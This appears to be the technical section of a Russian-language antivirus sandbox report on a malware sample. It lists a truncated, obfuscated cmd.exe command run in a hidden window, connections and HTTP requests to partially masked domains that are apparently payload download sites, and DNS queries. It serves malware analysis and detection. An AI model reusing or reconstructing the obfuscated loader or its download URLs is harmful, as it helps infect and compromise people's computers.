Техническая информация
- '<SYSTEM32>\cmd.exe' \/\ /\// /V:O/C"set $,-;=20a7 0a72 a270 a207 072a 0a27 270a 702a a270 702a 207a a270 720a a072 702a 027a 2a70 27a0}02a7}70a2{270ah720ac702at20a7aa207c027a}207a;72a0ka270a0a72ea702r0a72ba207;072...
- 'xi###iaopi.com':80
- 'li#####htebalik.com.tr':80
- 'li#####htebalik.com.tr':443
- 'x1.#.lencr.org':80
- http://www.xi###iaopi.com/DTWn8HR6e
- http://www.li#####htebalik.com.tr/44v1qfZIhA
- http://x1.#.lencr.org/
- 'li#####htebalik.com.tr':443
- DNS ASK em######lorianopolis.com.br
- DNS ASK xi###iaopi.com
- DNS ASK uf###it.com.au
- DNS ASK li#####htebalik.com.tr
- DNS ASK x1.#.lencr.org
- DNS ASK wp####onsite.com
- '<SYSTEM32>\cmd.exe' \/\ /\// /V:O/C"set $,-;=20a7 0a72 a270 a207 072a 0a27 270a 702a a270 702a 207a a270 720a a072 702a 027a 2a70 27a0}02a7}70a2{270ah720ac702at20a7aa207c027a}207a;72a0ka270a0a72ea702r0a72ba207;072...' (со скрытым окном)